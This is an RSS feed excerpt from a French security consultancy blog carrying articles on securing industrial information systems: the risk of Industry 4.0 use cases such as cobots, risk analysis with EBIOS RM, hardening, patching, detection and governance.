<figure id="post-15186 media-15186" class="align-none"><img fetchpriority="high" decoding="async" class="aligncenter wp-image-15186 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/1.png" alt="" width="885" height="293" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/1.png 885w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/1-437x145.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/1-71x24.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/1-768x254.png 768w" sizes="(max-width: 885px) 100vw, 885px" /></figure>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Cette 4<sup>e</sup> révolution industrielle marque l’arrivée de nouvelles technologies toujours plus connectées aboutissant à un haut niveau de dépendance à l’informatique</h2>
<p style="text-align: justify;">L’Industrie 4.0 regroupe un <strong>ensemble d’avancées technologiques et d’outils techniques permettant d’optimiser des processus industriels.</strong></p>
<p>&nbsp;</p>
<figure id="post-15188 media-15188" class="align-none"><img decoding="async" class="aligncenter wp-image-15188 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/2.png" alt="" width="810" height="330" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/2.png 810w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/2-437x178.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/2-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/2-768x313.png 768w" sizes="(max-width: 810px) 100vw, 810px" /></figure>
<p style="text-align: justify;">Prenons un exemple concret d’un cas d’usage :</p>
<figure id="post-15190 media-15190" class="align-none" style="text-align: justify;"></figure>
<p style="text-align: justify;">Une entreprise a besoin d’accélérer sa cadence de production et de robotiser une partie de ses actions pour gagner du temps. Par exemple, des actions de vissage. Elle choisit d’utiliser pour cela un robot collaboratif, aussi appelé « cobot »<a href="#_ftn1" name="_ftnref1">[1]</a> capable de réaliser des actions en simultané ou sur un même espace de travail qu’un opérateur. Celui-ci aura la charge de présenter les pièces à visser au cobot.</p>
<p>&nbsp;</p>
<p><img decoding="async" class="aligncenter wp-image-15190 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/3.jpg" alt="" width="291" height="599" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/3.jpg 291w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/3-93x191.jpg 93w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/3-19x39.jpg 19w" sizes="(max-width: 291px) 100vw, 291px" /></p>
<p>&nbsp;</p>
<p style="text-align: justify;">La mise en place de ce binôme permet, en plus de <strong>réduire le délai d’exécution, d’augmenter la qualité du produit fini.</strong></p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Les cas d’usage liés à l’Industrie 4.0 augmentent le risque cyber pesant sur les processus métiers. Deux raisons à cela : la nécessité de nouvelles interconnexions des systèmes industriels avec l’extérieur et l’augmentation de l’impact potentiel en cas de compromission.</h2>
<p style="text-align: justify;">Quels sont les impacts pour la cybersécurité dans toute cette histoire ? Si nous poursuivons avec ce cobot, le vissage, initialement effectué manuellement par un opérateur, est maintenant facilité par l&rsquo;utilisation du cobot. Le cobot doit être connecté pour recevoir des ordres et être mis à jour.</p>
<ul style="text-align: justify;">
<li>L’opération manuelle est remplacée par une opération informatisée maintenant exposée à une cyberattaque</li>
</ul>
<p style="text-align: justify;">Sur un robot classique, une « cage de sécurité » est présente pour éviter une intrusion d’un opérateur pendant le fonctionnement de la machine-outil. Sur un cobot, comme il y a collaboration avec l’opérateur cette protection n&rsquo;existe pas. <strong>Un impact en cas de contact entre le tournevis du cobot et la main de l’opérateur serait particulièrement grave pour celui-ci !</strong></p>
<ul style="text-align: justify;">
<li>L’introduction de nouvelles technologies peut augmenter la gravité d’une attaque cyber</li>
</ul>
<p style="text-align: justify;">Et cela n’est pas la seule conséquence d’une utilisation non sécurisée d’une telle technologie :</p>
<ul style="text-align: justify;">
<li>La modification d’une valeur dans le cobot concernant le couple de vissage peut entrainer <strong>un défaut de qualité en cas de mauvais serrage ;</strong></li>
<li>L’importance plus élevée des opérations assistées implique qu’en cas de défaillance, l’impact sera plus fort sur la production… ce qui va rapidement induire un impact financier.</li>
</ul>
<p style="text-align: justify;">Résumons de manière un peu simpliste :</p>
<p>&nbsp;</p>
<figure id="post-15192 media-15192" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15192 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/4.png" alt="" width="532" height="447" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/4.png 532w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/4-227x191.png 227w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/4-46x39.png 46w" sizes="auto, (max-width: 532px) 100vw, 532px" /></figure>
<p>&nbsp;</p>
<p style="text-align: justify;">La question est maintenant de savoir <strong>comment traiter ces risques, sans bloquer les demandes légitimes</strong> des opérationnels. Spoiler : non, refuser le projet n’est pas la solution !</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Les équipes responsables de la cybersécurité peuvent anticiper les besoins de mise en place de technologies 4.0 par l’établissement de fiches réflexes adaptées</h2>
<p style="text-align: justify;">D’un point de vue technique nous pouvons regrouper les avancées liées à l’Industrie 4.0 autour de quelques grandes thématiques : réalité augmentée, objet connecté, fabrication additive… En amont des projets et avec quelques acteurs métiers bien renseignés autour de la table, il est possible d’anticiper les demandes potentielles.</p>
<p style="text-align: justify;">L’objectif pour l’équipe cybersécurité va être alors <strong>de dresser le portrait-robot des cas d’usage type</strong>, en déduire les risques potentiels et commencer à identifier des mesures de sécurité adaptées pour y répondre. C’est aussi l’occasion de proposer <strong>des check-lists « Industrie 4.0 » pour sensibiliser en amont des projets</strong>.</p>
<p style="text-align: justify;">Concrètement, voici un exemple de fiche réflexe type appliquée à notre cobot vu précédemment :</p>
<p>&nbsp;</p>
<figure id="post-15194 media-15194" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15194 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5.png" alt="" width="854" height="589" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5.png 854w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5-277x191.png 277w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5-57x39.png 57w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5-768x530.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/5-245x170.png 245w" sizes="auto, (max-width: 854px) 100vw, 854px" /></figure>
<p>&nbsp;</p>
<p style="text-align: justify;">En se préparant en amont, les équipes cybersécurité sont plus pertinentes et efficaces lorsqu’un nouveau projet est sur le point de démarrer.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Prêt à se lancer dans un projet « 4.0 » ? C’est l’occasion idéale d’accompagner le métier dans la transformation de son usine en proposant des services de cybersécurité adaptés.</h2>
<p style="text-align: justify;">L’avantage des projets « Industrie 4.0 » consiste dans leur capacité à faire évoluer en profondeur les fondations, parfois un peu poussiéreuses, des systèmes et réseaux déjà installés en usine.</p>
<p style="text-align: justify;">Un projet de convoyeur a-t-il besoin d’échanger des informations avec l’extérieur de l’usine ? C’est l’occasion de proposer un serveur d’échange de fichiers sécurisés dans votre DMZ<a href="#_ftn2" name="_ftnref2">[2]</a> industrielle (en absence de celle-ci, c’est également le bon moment pour y réfléchir…). Un système de réalité augmentée a-t-il besoin d’une connexion sans fil plus stable ? C’est le moment d’engager une réflexion sur le renforcement du contrôle des appareils pouvant s’y connecter…</p>
<p style="text-align: justify;">Au risque de reprendre des évidences ici, l’idéal <strong>est d’arriver en amont des projets</strong>, par une approche constructive, plutôt qu’à travers une PSSI<a href="#_ftn3" name="_ftnref3">[3]</a> de 100 pages et des guides de normes et règles techniques non adaptés aux cas d’usages présentés.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Pour l’analyse de risques d’un projet « Industrie 4.0 », la méthode d’analyse de risques EBIOS RM facilite les échanges par le partage de scénarios stratégiques compréhensibles par le métier</h2>
<p style="text-align: justify;">Une fois les discussions engagées autour d’un projet concret, il est utile de réaliser une analyse de risques qui servira de support aux discussions. Sa profondeur et sa méthode vont dépendre de la taille et des risques du projet.</p>
<p style="text-align: justify;">Cette analyse va permettre d’affiner les objectifs que l’on souhaite protéger, prendre du recul sur l’écosystème en place et définir des scénarios d’attaques les plus probants.</p>
<p style="text-align: justify;">Voici quelques exemples de scénarios fréquemment retrouvés :</p>
<ul style="text-align: justify;">
<li><strong>Le sabotage logique à des fins financières</strong> (version longue du scénario Ransomware) : Une attaque ciblée ou non, permettant de rendre les équipements indisponibles en vue d’un gain financier.</li>
<li><strong>L’arrêt/ralentissement de la production</strong> : Sabotage ciblé en vue d’obtenir un avantage concurrentiel, une revanche par idéologie ou juste par défi peut être opéré par un concurrent malveillant, un vengeur, un terroriste, un activiste ou voir même un amateur en quête de frissons. Attention également à ne pas oublier les erreurs de manipulation !</li>
<li><strong>L’altération de la qualité de la pièce produite</strong>: sabotage plutôt sophistiqué et ciblé impactant la qualité des produits pour décrédibiliser l’entreprise ou simplement créer des dégâts.</li>
</ul>
<p>&nbsp;</p>
<figure id="post-15196 media-15196" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15196 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/6.png" alt="" width="847" height="144" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/6.png 847w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/6-437x74.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/6-71x12.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/02/6-768x131.png 768w" sizes="auto, (max-width: 847px) 100vw, 847px" /></figure>
<p>&nbsp;</p>
<p style="text-align: justify;">La conclusion de l’analyse de risques va permettre de définir précisément les mesures de cybersécurité à mettre en place et les risques résiduels associés.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Sortir du modèle tout « château fort », à savoir tout miser sur l’isolement de son SI industriel et la sécurité périmétrique, et proposer des mesures de sécurité adaptées : détection plus fine, chiffrement, MCS<a href="#_ftn4" name="_ftnref4">[4]</a>&#8230; en quelque sorte, c’est le moment de passer aux mesures “4.0”</h2>
<p style="text-align: justify;">Nos retours d’expérience montrent que la définition d’un plan d’actions est un travail d’équilibriste dans ces projets « 4.0 ». En effet, en appliquant un modèle de sécurité trop restrictif, à base de zones et conduits type IEC 62443-3-3, nous courrons à l’incompréhension entre les parties prenantes. En effet les solutions métiers <strong>ne sont pas toutes compatibles, pas toutes matures et n’ont pas encore intégré les standards que nous aimerions voir appliquer.</strong></p>
<p style="text-align: justify;">Alors que faire ? Une piste pourrait être de proposer des mesures de sécurité adaptées, des mesures « 4.0 » (pour l’environnement industriel en tout cas) mais qui ont déjà fait leurs preuves dans d’autres environnements :</p>
<ul style="text-align: justify;">
<li>Pour éviter une propagation d’une menace, <strong>renforcer les moyens de détection</strong>, surtout les flux en provenance et à destination des SI industriels. C’est le moment d’en profiter pour faire un accostage avec le SOC Groupe si ce n’est pas déjà fait.</li>
<li>Afin de s’assurer de l’intégrité et la traçabilité des données transmises/reçues​, on peut <strong>mettre en place du chiffrement et de l’authentification</strong>. Vous avez déjà une PKI Groupe ? Pourquoi ne pas réfléchir à l’étendre aux périmètres industriels.</li>
<li>C’est également le bon moment <strong>pour renforcer son processus de MCO / MCS</strong>. La solution est connectée avec l’extérieur ? Plus d’excuse pour ne pas <strong>installer un antivirus, le mettre à jour, installer les patchs de sécurité</strong> de son OS favori, etc. Ce point est à anticiper en amont de l’achat de la solution, plutôt qu’une fois le produit déjà installé !</li>
<li>Enfin la solution est critique pour le métier ? Un volet cyber résilience doit être anticipé pour pouvoir reconstruire rapidement la solution et repartir en cas d’attaque.</li>
</ul>
<p style="text-align: justify;">Comme nous venons de le voir, les solutions ne manquent pas, mais nécessitent un accompagnement adapté de la part des équipes cybersécurité et de dépasser les modèles théoriques. <strong>Alors, profitons de ces projets « 4.0 » pour faire évoluer nos modèles de cybersécurité industrielle </strong>sans apriori !</p>
<p>&nbsp;</p>
<p style="text-align: left;"><a href="#_ftnref1" name="_ftn1">[1]</a> <a href="https://commons.wikimedia.org/wiki/File:Cobot.jpg">https://commons.wikimedia.org/wiki/File:Cobot.jpg</a> licence CC : https://creativecommons.org/licenses/by-sa/4.0/deed.en</p>
<p style="text-align: left;"><a href="#_ftnref2" name="_ftn2">[2]</a> Zone démilitarisée, ici la zone réseau tampon entre le SI Industriel et le SI de gestion</p>
<p style="text-align: left;"><a href="#_ftnref3" name="_ftn3">[3]</a> Politique de Sécurité des Système d’Information</p>
<p style="text-align: left;"><a href="#_ftnref4" name="_ftn4">[4]</a> Maintien en Conditions de Sécurité</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/02/la-cybersecurite-industrielle-a-lere-de-lindustrie-4-0-comment-securiser-ces-nouveaux-cas-dusage-et-accompagner-les-projets-metiers/">La cybersécurité industrielle à l’ère de l’Industrie 4.0 : comment sécuriser ces nouveaux cas d’usage et accompagner les projets métiers ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Saga (3/3) &#8211; Retours d&#8217;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI Industriels</title>
		<link>https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-3-3/</link>
		
		<dc:creator><![CDATA[Ali Fawaz]]></dc:creator>
		<pubDate>Wed, 18 Dec 2019 14:11:04 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[cyberresilience]]></category>
		<category><![CDATA[détection]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[remédiation]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[système d'information]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=12373</guid>

					<description><![CDATA[<p>Nous avons vu au travers des articles précédents les solutions permettant d’initier la sécurisation des SI Industriels. Une fois cette sécurisation réalisée, le maintien en conditions de sécurité doit être assuré tout comme la mise en place de moyens de...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-3-3/">Saga (3/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI Industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Nous avons vu au travers des articles précédents les solutions permettant d’initier la sécurisation des SI Industriels. Une fois cette sécurisation réalisée, le maintien en conditions de sécurité doit être assuré tout comme la mise en place de moyens de détection.</em></p>
<h2>La couverture des risques dans la durée</h2>
<h3>Le durcissement des équipements</h3>
<p>En complément d’une architecture et d’un outillage d’administration sécurisés, il convient d’élever le niveau de sécurité de chaque équipement en appliquant un principe de strict nécessaire. Un guide de <strong>durcissement</strong> générique peut être créé et adapté à chaque technologie identifiée lors de la cartographie du SI Industriel. Celui-ci permet de remédier à une partie des vulnérabilités présentes au niveau des configurations et des systèmes.</p>
<p>L’utilisation de solutions complémentaires peut également apporter un surplus de sécurité :</p>
<ul>
<li>Les <strong>antivirus </strong>connectés au réseau ou non (impliquant une mise à jour manuelle) vont couvrir les postes industriels contre les virus les plus communs ;</li>
<li>La mise en place de règles strictes sur les <strong>pare feux locaux </strong>des machines va empêcher les communications, et donc intrusions, sur les ports inutilisés, et filtrer l’origine des flux en fonction des protocoles utilisés, permettant de mieux détecter des tentatives d’attaques ;</li>
<li><strong>Des solutions de gestion des comptes administrateurs locaux </strong>(par exemple LAPS pour Windows) peuvent enfin permettre de gérer les comptes administrateur natifs des postes de manière centralisée et individualisée.</li>
</ul>
<p>Il arrive cependant qu’il ne soit plus possible de durcir un équipement du fait de sa vétusté, il faut alors travailler avec le Métier sur la <strong>gestion de l’obsolescence</strong> des équipements, sur leur éventuel remplacement et en dernier recours sur les capacités à les isoler du reste du SI. Des <strong>bloqueurs de configuration</strong> pourront également permettre, sur des postes vétustes, de restreindre l’installation et l’utilisation de composants à ceux uniquement nécessaire.</p>
<p>Il est important de rappeler que le SI Industriel souffre de certaines vulnérabilités, mais est avant tout l’outil de production du Métier. Le dialogue avec ces équipes est donc primordial à la compréhension de l’utilisation qu’ils en font afin de résoudre ces vulnérabilités en limitant les conséquences au maximum pour le métier.</p>
<h3>Le maintien en conditions de sécurité</h3>
<p>Lorsque les équipements atteignent le bon niveau de sécurité, il faut prévoir son maintien dans le temps. <strong>Différents scénarios de gestion des correctifs de sécurité ou « patchs »</strong> peuvent être définis pour répondre également aux besoins du Métier (disponibilité, intégrité) et synchronisés avec la maintenance industrielle :</p>
<ol>
<li><strong>Intégration dans les processus nominaux d’exploitation </strong>(par exemple : les processus de qualification / qualité d’une installation peuvent imposer que les équipements soient à jour). La mise à jour et l’administration des équipements tireront ainsi profit des arrêts industriels d’autant plus si une re-certification est nécessaire.</li>
</ol>
<p>&nbsp;</p>
<figure id="post-12374 media-12374" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12374 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-1.png" alt="" width="1230" height="737" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-1.png 1230w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-1-319x191.png 319w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-1-65x39.png 65w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-1-768x460.png 768w" sizes="auto, (max-width: 1230px) 100vw, 1230px" /></figure>
<p>&nbsp;</p>
<ol start="2">
<li>Préparation d’un <strong>processus de mise à jour « à chaud » </strong>en cas de faille de sécurité critique et d’un processus d’isolation préventive d’une ligne de production le temps que le procédé puisse être interrompu ;</li>
<li><strong>Identification des équipements redondants </strong>ou périphériques sur lesquels une intervention avec simple information des responsables de sites est possible.</li>
</ol>
<p>&nbsp;</p>
<figure id="post-12376 media-12376" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12376 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-1.png" alt="" width="1259" height="768" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-1.png 1259w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-1-313x191.png 313w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-1-64x39.png 64w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-1-768x468.png 768w" sizes="auto, (max-width: 1259px) 100vw, 1259px" /></figure>
<p>&nbsp;</p>
<p>Afin de mettre en place ces process de patch, la cartographie réalisée précédemment doit faire apparaître un<strong> inventaire précis des équipements</strong> devant inclure :</p>
<ul>
<li>L’identification des équipements, leur type, localisation et nombre ;</li>
<li>Les procédés industriels pour lesquels ils sont utilisés et la criticité associée ;</li>
<li>Le système d’exploitation/le<em>firmware</em>, les outils et la configuration ainsi que la mention des versions déployées ;</li>
<li>Les besoins en termes de cybersécurité au regard des procédés supports ;</li>
<li>La disponibilité de redondance, de mise en tampon des données et de cold spare ;</li>
<li>La fréquence de patch requise et l’historique de patch.</li>
</ul>
<p>Le maintien du niveau de sécurité ne se base pas uniquement sur l’application de correctifs de sécurité sur les équipements. Il convient également de :</p>
<ul>
<li>Définir le processus de <strong>mise à jour des solutions de sécurité </strong>installées sur les équipements coupés du réseau ;</li>
<li>Installer des <strong>solutions de nettoyage de média amovibles </strong>qui restent très présents sur les sites industriels – certains produits ont l’avantage d’être portables et donc d’analyser le média pendant le déplacement à l’intérieur du site industriel ;</li>
<li>Assurer la <strong>sauvegarde des configurations </strong>des équipements et leurs <strong>intégrations au DRP</strong> afin de garantir une remise en route post-incident qui réponde aux besoins de disponibilité ;</li>
<li>Mettre en place un <strong>suivi de l’IAM<a href="#_ftn1" name="_ftnref1">[1]</a> Industriel</strong> afin d’avoir un contrôle d’accès physique et logique robuste. Cette action permettra aussi d’automatiser de nombreuses actions fastidieuses de revue de comptes parfois encore faites à la main.</li>
</ul>
<p>&nbsp;</p>
<h2>La détection des incidents de cyber sécurité</h2>
<p>Les mesures citées précédemment permettent de réduire la probabilité d’occurrence des risques et donc d’augmenter la disponibilité des équipements pour le Métier. Il faut néanmoins se préparer au pire et avoir les outils nécessaires à la <strong>détection d’un incident</strong> pour le remédier au plus vite et garantir un temps d’interruption réduit au maximum.</p>
<h3>La mise en place de la détection</h3>
<p>La première étape à réaliser est l’activation des fonctions IDPS<a href="#_ftn2" name="_ftnref2">[2]</a> sur les équipements réseaux afin d’assurer <strong>un premier stade de détection et potentiellement de blocage </strong>automatique.</p>
<p>Il s’agit ensuite d’assurer la <strong>collecte d’informations </strong>en déployant un concentrateur sur site.<strong> </strong>Les logs des équipement réseaux et serveurs pourront ainsi être envoyés aux SIEM<a href="#_ftn3" name="_ftnref3">[3]</a> existants ou dédiés dans lesquels se feront <strong>corrélation et détection</strong>. Les SOC<a href="#_ftn4" name="_ftnref4">[4]</a> et CERT<a href="#_ftn5" name="_ftnref5">[5]</a> peuvent alors réaliser les opérations d’analyse, de détection et éventuellement de réaction sur incident en se basant sur des scénarios classiques.</p>
<p>&nbsp;</p>
<figure id="post-12378 media-12378" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12378 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-1.png" alt="" width="1250" height="306" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-1.png 1250w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-1-437x107.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-1-71x17.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-1-768x188.png 768w" sizes="auto, (max-width: 1250px) 100vw, 1250px" /></figure>
<p>&nbsp;</p>
<h3>L’anticipation de risques spécifiques</h3>
<p>Cependant, la détection basée sur des scénarios classiques n’apportera que peu de valeur aux métiers. La prise en compte de l’ensemble des sources (PC, Linux, UNIX…) et la <strong>mise en place de sondes dédiées aux SI Industriels</strong> capables de s’interfacer avec des systèmes SCADA peut permettre d’améliorer le système de détection. Toutefois, ces solutions peuvent s’avérer coûteuses.</p>
<p>L’élément clé consistera ici à assurer une montée en maturité et en valeur incrémentale et rapide du SOC.</p>
<p>&nbsp;</p>
<figure id="post-12380 media-12380" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12380 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-1.png" alt="" width="1247" height="600" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-1.png 1247w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-1-397x191.png 397w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-1-71x34.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-1-768x370.png 768w" sizes="auto, (max-width: 1247px) 100vw, 1247px" /></figure>
<p>&nbsp;</p>
<h3>Se préparer à la remédiation</h3>
<p>Pour finir, la détection d’un incident ne pourra aboutir à une remédiation efficace que si le Métier est inclus. Tout comme pour les mises à jour d’équipements, il convient donc de revoir les <strong>procédures d’arrêt d’urgence</strong> avec les utilisateurs du SI Industriel. La formalisation d’un <strong>Plan de Réponse à Incident </strong>permet de planifier les actions à mener en cas d’incident cyber-industriel.</p>
<p>Des <strong>exercices de gestion de crise dédiés au SI Industriel</strong> doivent également être menés pour assurer une préparation optimale des équipes et mettre en lumière les éventuels manques.</p>
<p>&nbsp;</p>
<h2>Une approche progressive et participative garantira le succès de la démarche</h2>
<p>La mise en conditions de sécurité d’un SI Industriel est un chantier complexe qui ne peut être faite qu’avec le Métier. Il convient donc de travailler avec lui de manière progressive et participative sur chacun des chantiers suivants :</p>
<ul>
<li><strong>Prendre connaissance de son SI Industriel </strong>en réalisant une cartographie en priorisant les éléments les plus critiques ;</li>
<li><strong>Mitiger les risques sur le SI Industriel </strong>en mettant en place l’état de l’art de l’architecture réseau sécurisée et définir les processus d’administration – les SI de Sûreté, par leur criticité, devront faire l’objet d’une attention particulière ;</li>
<li><strong>Atteindre un niveau de sécurité adéquat </strong>par le durcissement et le maintien en conditions de sécurité des équipements dans le temps – des discussions pourront notamment avoir lieu avec les fournisseurs et constructeurs d’équipements ;</li>
<li><strong>Mettre en place les outils nécessaires à la détection d’incident de sécurité</strong>, qui peuvent avoir une influence sur la production, et définir les processus de réaction.</li>
</ul>
<p>Toutes ces actions ne peuvent pas toujours être menées en parallèle. La <strong>définition d’une feuille de route</strong> claire va permettre la priorisation des différentes actions pour pouvoir maitriser les coûts et maximiser l’apport pour le Métier.</p>
<p>Si ce vaste chantier est souvent initialisé en central, l’enjeu reste de pouvoir embarquer les sites, parfois répartis dans le monde entier, pour assurer une sécurité pérenne dans le temps. Nous observons, en général, une démarche en deux temps :</p>
<ol>
<li>Un <strong>programme cybersécurité pluriannuel </strong>(souvent 3 ans) pour un budget de 10 à 15 millions d’euros visant à :</li>
</ol>
<ul>
<li>Réaliser l’inventaire des SI Industriels ;</li>
<li>Élever le niveau de sécurité du parc existant par la mise en place de protections souvent périmétriques et de filtrage ainsi que la remédiation des vulnérabilités les plus critiques – la définition de procédures est ici nécessaire ;</li>
<li>Faire émerger un premier réseau de coordinateurs cybersécurité locaux ;</li>
</ul>
<ol start="2">
<li>La création d’une <strong>filière cybersécurité industrielle </strong>et de<strong> la gouvernance associée</strong> réunissant :</li>
</ol>
<ul>
<li>Le cadrage des activités clés à piloter par les acteurs locaux ;</li>
<li>La construction participative d’outils pour aider ce réseau de responsable locaux à opérer les activités de cybersécurité sur le contenu ;</li>
<li>La construction des moyens de pilotage de la montée en maturité et de gestion du changement (matrices de maturité, outils de modélisation budgétaire par site, définition d’indicateurs de pilotage, services centraux consommables par les sites…).</li>
</ul>
<p>La mise en place de la gouvernance peut démarrer après le programme et tirer ainsi profit du premier réseau de correspondants sensibilisés à la cybersécurité bâti par le programme.</p>
<p>Une fois construite, il s’agit ensuite de l’animer et de piloter la progression des sites et des systèmes industriels à la fois en termes de niveau de sécurité et de niveau de maturité.</p>
<p>Cette animation réunit en général :</p>
<ul>
<li>Un réseau responsables cybersécurité locaux de 0,5 à 2 ETP<a href="#_ftn6" name="_ftnref6">[6]</a> par site en charge de réaliser les projets, d’implémenter les activités récurrentes de cybersécurité, d’améliorer continuellement la sécurité et de reporter ;</li>
<li>Une équipe centrale de 3 à 10 ETP pilotant globalement et appuyant les responsables locaux notamment en termes d’expertise.</li>
</ul>
<p>&nbsp;</p>
<p><a href="#_ftnref1" name="_ftn1">[1]</a> IAM i.e. <em>Identity and Access Management</em>.</p>
<p><a href="#_ftnref2" name="_ftn2">[2]</a> IDPS i.e. <em>Introduction Detection and Prevention Systems</em>.</p>
<p><a href="#_ftnref3" name="_ftn3">[3]</a> SIEM i.e. <em>Security Incident and Event Management</em>.</p>
<p><a href="#_ftnref4" name="_ftn4">[4]</a> SOC i.e. <em>Security Operation Center</em>.</p>
<p><a href="#_ftnref5" name="_ftn5">[5]</a> CERT i.e. Computer Emergency Response Team.</p>
<p><a href="#_ftnref6" name="_ftn6">[6]</a> Ces chiffres peuvent varier significativement en fonction de la taille de l’entreprise et du nombre de sites locaux, il s’agit d’une moyenne observée dans de grandes organisations internationales que Wavestone accompagne.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-3-3/">Saga (3/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI Industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Saga (2/3) &#8211; Retours d&#8217;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</title>
		<link>https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-2-3/</link>
		
		<dc:creator><![CDATA[Ali Fawaz]]></dc:creator>
		<pubDate>Mon, 16 Dec 2019 14:09:32 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[administration]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[système d'information]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=12344</guid>

					<description><![CDATA[<p>Après avoir découvert les prémisses de la sécurisation des SI Industriels au travers de la cartographie de ces systèmes et de leur cloisonnement, nous allons maintenant aborder leur administration. L’administration, point névralgique de l’architecture réseau L’administration d’un SI est essentielle...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-2-3/">Saga (2/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
